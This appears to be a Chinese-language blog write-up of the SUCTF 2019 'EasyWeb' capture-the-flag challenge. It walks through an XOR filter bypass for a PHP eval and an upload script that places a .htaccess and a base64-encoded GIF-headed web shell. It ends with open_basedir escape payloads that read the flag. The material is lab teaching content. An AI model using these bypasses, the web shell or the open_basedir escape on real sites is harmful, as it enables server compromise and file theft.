[SUCTF 2019]EasyWeb 1
进入环境,发现源码:
<?php
function get_the_flag(){// webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);if(!file_exists($userdir)){mkdir($userdir);}if(!empty($_FILES["file"])){$tmp_name = $_FILES["file"]["tmp_name"];$name = $_FILES["file"]["name"];$extension = substr($name, strrpos($name,".")+1);if(preg_match("/ph/i",$extension)) die("^_^"); if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");if(!exif_imagetype($tmp_name)) die("^_^"); $path= $userdir."/".$name;@move_uploaded_file($tmp_name, $path);print_r($path);}
}$hhh = @$_GET['_'];if (!$hhh){highlight_file(__FILE__);
}if(strlen($hhh)>18){die('One inch long, one inch strong!');
}if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )die('Try something else!');$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");eval($hhh);
?>
在这道题中有大量的过滤 首先是 要求传入的变量长度小于18
紧接着就是严苛的正则匹配,我们前面有见过 这里要采用 异或 或者 取反 绕过
由于禁用了 ~
这里取反无法实现
这里放一篇师傅的抑或脚本:
<?php
$l = "";
$r = "";
$argv = str_split("_GET"); ##将_GET分割成一个数组,一位存一个值
for($i=0;$i<count($argv);$i++){ for($j=0;$j<255;$j++){$k = chr($j)^chr(255); ##进行异或 if($k == $argv[$i]){if($j<16){ ##如果小于16就代表只需一位即可表示,但是url要求是2位所以补个0$l .= "%ff";$r .= "%0" . dechex($j);continue;}$l .= "%ff";$r .= "%" . dechex($j);}}}
构造payload:
?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=phpinfo
flag竟然·在phpinfo里面感觉前面的原代码都没啥用
上网看了师傅们的wp后发现 这只是一种取巧的方法,正常的思路因该是:
?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%86}();&%86=get_the_flag
但是一片空白
上面还有代码没看,我们仔细研究下:
<?php
function get_the_flag(){// webadmin will remove your upload file every 20 min!!!! //每20分钟删除我们上传的文件$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); //命名格式if(!file_exists($userdir)){mkdir($userdir); //判断文件是否存在 不存在 新建文件夹}if(!empty($_FILES["file"])){ //判断文件是否为空 $tmp_name = $_FILES["file"]["tmp_name"];$name = $_FILES["file"]["name"];$extension = substr($name, strrpos($name,".")+1); //令extension 变量等于文件后缀if(preg_match("/ph/i",$extension)) die("^_^"); //不能以 php为后缀if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");//获取的文件中不能含有 <?if(!exif_imagetype($tmp_name)) die("^_^"); //判断图片文件头$path= $userdir."/".$name;@move_uploaded_file($tmp_name, $path);print_r($path);}
}
总结:
我们上传的文件后缀不能为 php 同时会检查文件头 不能含有 <?
- 不能为 php的话 可以上传.htaccess
- 检查文件头是否为 图片:GIF89a12
- 不能含有<? : 一般是使用
<script language="php"></script>
但这里php版本不支持使用 我们就直接 base64编码来进行绕过了
在这里直接使用上传脚本了:
import requests
import base64htaccess = b"""
#define width 1337
#define height 1337
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
"""
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://dfcea339-b6d8-4b48-99ac-9bfaecda5527.node4.buuoj.cn:81//?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"files = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)files = {'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)
得到上传路径:
``尝试访问上传脚本:
因为这里有open_basedir
的限制,我们不能直接访问flag
我们需要进行绕过
具体参考文章
payload:
?cmd=chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
?cmd=chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));
获得flag!
[SUCTF 2019]EasyWeb 1相关推荐
- [SUCTF 2019]CheckIn
web第25题 [SUCTF 2019]CheckIn 打开靶场 看来是一个文件上传的题 上传正常图片 返回路径,注意到有一个index.php 尝试直接上传一句话木马shell.php 提示非法后缀 ...
- [SUCTF 2019] SignIn
[SUCTF 2019] SignIn 如果对本文存在有疑问或需要工具可以在下方给我留言! 这题比较简单 题目下载地址:https://www.lanzoux.com/iawzl2f 程序没有加壳,直 ...
- [SUCTF 2019]Game
[SUCTF 2019]Game 题目地址 : https://buuoj.cn/challenges#[SUCTF%202019]Game 题目一共两个附件,先把src.zip 解压,在src目录下 ...
- web buuctf [SUCTF 2019]Pythonginx1
知识点:1.nignx 2.idna编码与utf-8编码的漏洞 1.开题 查看源码,整理代码: @app.route('/getUrl', methods=['GET', 'POST']) def g ...
- BUUCTF:[SUCTF 2019]Game
https://buuoj.cn/challenges#[SUCTF%202019]Game index.html中发现一串base32 >>> import base64 > ...
- BUUCTF-WEB:[SUCTF 2019]EasySQL 1
解题思路: ①先试试1'# 发现没有回显 ②试试1 有回显 ③试试单引号注入 ④试试用order by查询表的列数:1 order by 1 用不了联合注入了! 下面尝试使用堆叠注入: payloa ...
- [SUCTF 2019]EasySQL1
1.老规矩,先输入1 2.输入1 or 1,页面提示nonono,说明or已被列入黑名单,通过我们尝试,and,union等等都被列入黑名单. 3.我们来判断参数是否被引号,双引号,括号包裹. 输入1 ...
- [SUCTF 2019]EasySQL1 (buu一周目速通)
进入靶机,根据题目是一道sql注入题目,经过普通手段注入发现大部分关键词都被过滤了, Array ( [0] => 1 ) 一解:发现输入数字回显代码,字母不回显,所以猜测后台代码存在 ||(或 ...
- UNCTF2020web方向部分题解
文章目录 Web方向 easy_ssrf easyflask 俄罗斯方块人大战奥特曼 easyunserialize babyeval ezphp easy_upload UN's_online_to ...
- 【web-ctf】ctf_BUUCTF_web(2)
文章目录 BUUCTF_web SQL注入 1. [RCTF2015]EasySQL 2. [CISCN2019 华北赛区 Day1 Web5]CyberPunk 3. [CISCN2019 总决赛 ...
最新文章
- 最新Java面试题2021年,常见面试题及答案汇总
- 图画hadoop -- 生态圈
- 嵌入式成长轨迹53 【Zigbee项目】【CC2430基础实验】【串口时钟PC显示】
- workaround for COM_ATTRFRG_GEN 066
- 抓住尾部的StackOverFlowError
- Python之数据合并——【concat()函数、merge()函数、join()方法、combine_first()方法】
- 【Codeforces 321E / BZOJ 5311】【DP凸优化】【单调队列】贞鱼
- 判断回文(Java和JavaScript)
- Exploit Kit攻击工具包流量锐减96%!这段时间究竟发生了什么?
- 清华大学中国人工智能学会:2019人工智能发展报告
- Android的硬件缩放技术优化执行效率 Screen.SetResolution
- 笨方法学Python3 习题6
- uniapp开发app
- 整理了一份嵌入式相关开源项目、库、资料
- 关于 Win32/Conficker.B 蠕虫的病毒警报
- 数据恢复技巧:U盘文件被隐藏怎么恢复?
- 设置wps如何自动生成论文目录结构
- java多文件代码在线运行网站
- 使用ffmpeg来将mp4视频转换成gif格式图片
- Dynamic Topic Models的Python实现
热门文章
- 计算机操作员评分标准,计算机操作员EXCEL操作竞赛样卷与评分标准.doc
- 打开IIS管理器命令cmd
- 虚拟光驱xp版32位_Windows 32位系统将成历史,勾起了我对Windows XP满满的回忆
- 57 spi电平转换的坑
- 【转】西冷牛排,菲力牛排,眼肉牛排,雪花牛排,T骨牛排,沙朗牛排有什么不同?
- 手把手搭建VuePress文档
- 群晖系统服务器设置,私人云搭建 篇二:群晖系统搭建和初步设置的不正确指北...
- JDK下载安装教程及环境变量配置
- Log4j有哪几种日志级别呢?
- java log4j日志级别配置详解